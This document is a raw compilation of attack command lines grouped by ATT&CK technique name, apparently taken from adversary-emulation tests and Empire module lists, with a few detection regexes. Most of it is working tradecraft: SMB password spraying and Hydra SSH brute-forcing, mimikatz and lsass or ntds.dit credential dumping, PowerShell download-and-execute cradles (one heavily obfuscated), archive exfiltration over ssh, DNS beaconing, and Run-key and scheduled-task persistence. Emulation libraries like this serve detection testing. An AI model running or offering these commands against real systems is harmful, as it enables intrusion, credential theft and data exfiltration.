Technique Name: Brute Force
net user /domain > DomainUsers.txt
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
net user /domain > DomainUsers.txt
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:YOUR_COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
net user /domain > #{input_file_users}
echo "Password1" >> passwords.txt
echo "1q2w3e4r" >> passwords.txt
echo "Password!" >> passwords.txt
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
powershell/recon/get_sql_server_login_default_pw
powershell/recon/get_sql_server_login_default_pw
powershell/recon/http_login
powershell/recon/http_login
powershell/situational_awareness/network/smbautobrute
powershell/situational_awareness/network/smbautobrute
powershell/situational_awareness/network/smbscanner
powershell/situational_awareness/network/smbscanner
root @ icbc: / hacker / mima # hydra -l root -P passwd.txt ssh: //192.168.159.132 -V
Hydra v9.0 (c) 2019 by van Hauser / THC - Please do not use in military or secret service organizations, or for illegal purposes.
auth.log
Failed password for root from 192.168.159.129 port 43728 ssh2
audit.log
type=USER_AUTH msg=audit(1572163129.581:316): pid=2165 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=192.168.159.129 addr=192.168.159.129 terminal=ssh res=failed'
Technique Name: Commonly Used Port
!=powershell.exe
nslookup
!=cmd.exe
nslookup
powershell/lateral_movement/invoke_sshcommand
powershell/lateral_movement/invoke_sshcommand
Technique Name: Credential Dumping
hashdump
mimikatz !lsadump::sam
hashdump
run hashdump
run smart_hashdump
post/windows/gather/credentials/domain_hashdump
logonpasswords
mimikatz !sekurlsa::logonpasswords
mimikatz !sekurlsa::msv
mimikatz !sekurlsa::kerberos
mimikatz !sekurlsa::wdigest
use mimikatz
wdigest
msv
kerberos
logonpasswords
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
gsecdump -a
wce -o output.txt
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp
ntdsutil "ac i ntds" "ifm" "create full C:\Atomic_Red_Team" q q
vssadmin.exe create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE
findstr /S cpassword %logonserver%\sysvol\*.xml
. $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
Get-GPPPassword -Verbose
ntdsutil.exe
\\Windows\\.+\\lsass.exe
HKLM\SAM|HKLM\Security
\\Windows\\.+\\bcryptprimitives.dll|\\Windows\\.+\\bcrypt.dll|\\Windows\\.+\\ncrypt.dll
powershell/collection/ChromeDump
powershell/collection/ChromeDump
powershell/collection/FoxDump
powershell/collection/FoxDump
powershell/collection/ninjacopy
powershell/collection/ninjacopy
powershell/collection/vaults/add_keepass_config_trigger
powershell/collection/vaults/add_keepass_config_trigger
powershell/collection/vaults/find_keepass_config
powershell/collection/vaults/find_keepass_config
powershell/collection/vaults/get_keepass_config_trigger
powershell/collection/vaults/get_keepass_config_trigger
powershell/collection/vaults/keethief
powershell/collection/vaults/keethief
powershell/collection/vaults/remove_keepass_config_trigger
powershell/collection/vaults/remove_keepass_config_trigger
powershell/credentials/enum_cred_store
powershell/credentials/enum_cred_store
powershell/credentials/mimikatz/cache
powershell/credentials/mimikatz/cache
powershell/credentials/mimikatz/command
powershell/credentials/mimikatz/command
powershell/credentials/mimikatz/dcsync
powershell/credentials/mimikatz/dcsync
powershell/credentials/mimikatz/dcsync_hashdump
powershell/credentials/mimikatz/dcsync_hashdump
powershell/credentials/mimikatz/extract_tickets
powershell/credentials/mimikatz/extract_tickets
powershell/credentials/mimikatz/golden_ticket
powershell/credentials/mimikatz/golden_ticket
powershell/credentials/mimikatz/logonpasswords
powershell/credentials/mimikatz/logonpasswords
powershell/credentials/mimikatz/lsadump
powershell/credentials/mimikatz/lsadump
powershell/credentials/mimikatz/mimitokens
powershell/credentials/mimikatz/mimitokens
powershell/credentials/mimikatz/sam
powershell/credentials/mimikatz/sam
powershell/credentials/mimikatz/silver_ticket
powershell/credentials/mimikatz/silver_ticket
powershell/credentials/mimikatz/trust_keys
powershell/credentials/mimikatz/trust_keys
powershell/credentials/powerdump
powershell/credentials/powerdump
powershell/credentials/vault_credential
powershell/credentials/vault_credential
powershell/management/downgrade_account
powershell/management/downgrade_account
powershell/management/wdigest_downgrade
powershell/management/wdigest_downgrade
powershell/privesc/gpp
powershell/privesc/gpp
powershell/privesc/mcafee_sitelist
powershell/privesc/mcafee_sitelist
python/collection/linux/hashdump
python/collection/linux/hashdump
python/collection/linux/mimipenguin
python/collection/linux/mimipenguin
python/collection/osx/hashdump
python/collection/osx/hashdump
python/collection/osx/kerberosdump
python/collection/osx/kerberosdump
python/management/multi/kerberos_inject
python/management/multi/kerberos_inject
python/situational_awareness/network/dcos/etcd_crawler
python/situational_awareness/network/dcos/etcd_crawler
Technique Name: Data Compressed
dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
rar a -r #{output_file} #{input_path} *.txt
rar a -r %USERPROFILE%\data.rar #{input_path} *.txt
rar a -r #{output_file} %USERPROFILE% *#{file_extension}
zip $HOME/data.zip #{input_files}
zip $HOME/data.zip $HOME/*.txt
test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
tar -cvzf $HOME/data.tar.gz #{input_file_folder}
tar -cvzf $HOME/data.tar.gz $HOME/$USERNAME
rar.exe
powershell/management/zipfolder
powershell/management/zipfolder
Technique Name: Data Encoding
echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.#{destination_url}
echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.redcanary.com
Technique Name: Exfiltration Over Alternative Protocol
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\Windows\System32\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
powershell/exfiltration/exfil_dropbox
powershell/exfiltration/exfil_dropbox
exfiltration/Invoke_ExfilDataToGitHub
exfiltration/Invoke_ExfilDataToGitHub
Technique Name: Exploitation for Privilege Escalation
getsystem
getsystem
bitsadmin.exe
msbuild.exe *MSBuildShell.csproj
powershell/privesc/ms16-032
powershell/privesc/ms16-032
powershell/privesc/tater
powershell/privesc/tater
powershell/privesc/ms16-135
powershell/privesc/ms16-135
Technique Name: Network Sniffing
tcpdump -c 5 -nnni ens33
tshark -c 5 -i ens33
tcpdump -c 5 -nnni en0A
tshark -c 5 -i en0A
"c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
c:\windump.exe
& "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
& c:\windump.exe
powershell/collection/packet_capture
powershell/collection/packet_capture
python/collection/linux/sniffer
python/collection/linux/sniffer
python/collection/osx/sniffer
python/collection/osx/sniffer
Technique Name: Obfuscated Files or Information
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
$OriginalCommand = 'Write-Host "Hey, Atomic!"'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
$OriginalCommand = 'Write-Host "Hey, Atomic!"'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\Microsoft\Windows\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))"
[a-z0-9]{1}.exe
*.exe \*.exe\:Zone.Identifier:$DATA"
Technique Name: PowerShell
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password ATOM1CR3DT3@M -Description '#{description}'
New-LocalUser -FullName '#{full_name}' -Name 'atomic_user' -Password ATOM1CR3DT3@M -Description '#{description}'
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
New-LocalUser -FullName 'Atomic Red Team' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml');$Xml.command.a.execute | IEX"
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close()"
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
powershell.exe -version 2 -Command Write-Host $PSVersion
Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
Invoke-Expression $streamcommand
excel.exe
cmd.exe
powershell.exe
excel.exe
powershell.exe
mshta.exe
cmd.exe
powershell.exe
mshta.exe
powershell.exe
powerpoint.exe
cmd.exe
powershell.exe
powerpoint.exe
powershell.exe
powershell.exe webClient.DownloadString(
powershell.exe webClient.DownloadFile
powershell.exe webClient.DownloadData
winword.exe
powershell.exe
hidden|-enc|-NonI
\\Windows\\.+\\WindowsPowerShell\\.+\\powershell.exe
powershell/lateral_movement/invoke_psremoting
powershell/lateral_movement/invoke_psremoting
powershell/management/spawn
powershell/management/spawn
python/management/multi/spawn
python/management/multi/spawn
Technique Name: Registry Run Keys / Startup Folder
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\Microsoft\Windows\Start Menu\Programs\Startup
Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\Microsoft\Windows\Start Menu\Programs\Startup
\Microsoft\Windows\Start Menu\Programs\Startup
\Microsoft\Windows\Start Menu\Programs\Startup
powershell/persistence/elevated/registry
powershell/persistence/elevated/registry
powershell/persistence/userland/registry
powershell/persistence/userland/registry
Technique Name: Remote File Copy
rsync -r #{local_path} victim@#{remote_host}:#{remote_path}
rsync -r /tmp/adversary-rsync/ victim@#{remote_host}:#{remote_path}
rsync -r #{local_path} #{username}@victim-host:#{remote_path}
rsync -r #{local_path} #{username}@victim-host:/tmp/victim-files
rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}
rsync -r adversary@#{remote_host}:#{remote_path} /tmp/victim-files
rsync -r #{username}@adversary-host:#{remote_path} #{local_path}
rsync -r #{username}@adversary-host:/tmp/adversary-rsync/ #{local_path}
scp #{local_file} victim@#{remote_host}:#{remote_path}
scp /tmp/adversary-scp victim@#{remote_host}:#{remote_path}
scp #{local_file} #{username}@victim-host:#{remote_path}
scp #{local_file} #{username}@victim-host:/tmp/victim-files/
scp adversary@#{remote_host}:#{remote_file} #{local_path}
scp adversary@#{remote_host}:/tmp/adversary-scp #{local_path}
scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
scp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
sftp victim@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'
sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'
sftp #{username}@victim-host:/tmp/victim-files/ <<< $'put #{local_file}'
sftp adversary@#{remote_host}:#{remote_file} #{local_path}
sftp adversary@#{remote_host}:/tmp/adversary-sftp #{local_path}
sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
sftp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt
cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}
C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} Atomic-license.txt
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "Atomic-license.txt")
(New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", "Atomic-license.txt")
Technique Name: Scheduled Task
schtasks [/s HOSTNAME]
shell schtasks
Creating a scheduled task:
schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
Requirements for running scheduled tasks:
net start schedule
sc config schedule start= auto
Creating a scheduled task:
shell schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
Requirements for running scheduled tasks:
shell net start schedule
shell sc config schedule start= auto
at 13:20 /interactive cmd
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
SCHTASKS /Create /S #{target} /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
SCHTASKS /Create /S localhost /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
schtask.exe /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
schtask.exe /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
at.exe ##:## /interactive cmd
at.exe \\[computername|IP] ##:## c:\temp\evil.bat
net.exe use \\[computername|IP] /user:DOMAIN\username password
net.exe time \\[computername|IP]
schtasks.exe /create * appdata
\\Windows\\.+\\at.exe
/Create
\\Windows\\.+\\schtasks.exe
powershell/lateral_movement/new_gpo_immediate_task
powershell/lateral_movement/new_gpo_immediate_task
powershell/persistence/elevated/schtasks
powershell/persistence/elevated/schtasks
powershell/persistence/userland/schtasks
powershell/persistence/userland/schtasks
Technique Name: Standard Application Layer Protocol
Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null
curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com
curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).example.com" -QuickTimeout}
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType TXT
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}
Technique Name: Uncommonly Used Port
test-netconnection -ComputerName google.com -port #{port}
test-netconnection -ComputerName google.com -port 8081
telnet google.com #{port}
telnet google.com 8081